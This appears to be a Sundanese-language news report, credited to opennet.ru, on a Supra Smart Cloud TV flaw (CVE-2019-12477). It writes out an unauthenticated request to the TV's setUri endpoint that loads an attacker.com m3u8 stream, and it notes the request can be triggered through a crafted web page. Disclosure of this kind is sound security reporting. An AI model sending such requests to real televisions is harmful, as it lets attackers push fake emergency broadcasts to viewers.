Dina Supra Smart Cloud TV kerentanan (CVE-2019-12477) anu ngamungkinkeun anjeun ngagentos program anu ayeuna ditingali ku eusi panyerang. Salaku conto, kaluaran peringatan fiktif ngeunaan kaayaan darurat nunjukkeun.
Pikeun serangan, cukup pikeun ngirim pamundut jaringan anu didamel khusus anu henteu meryogikeun auténtikasi. Khususna, anjeun tiasa ngaksés panangan "/remote/media_control?action=setUri&uri=" ku netepkeun URL file m3u8 sareng parameter video, contona "http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker.com/fake_broadcast_message.m3u8.”
Dina kalolobaan kasus, aksés ka alamat IP TV diwatesan ka jaringan internal, tapi saprak pamundut dikirim via HTTP, anjeun tiasa nganggo metodeu pikeun ngakses sumberdaya internal nalika pamaké muka hiji halaman éksternal dirancang husus (contona, handapeun kedok hiji pamundut gambar atawa ngagunakeun ).
sumber: opennet.ru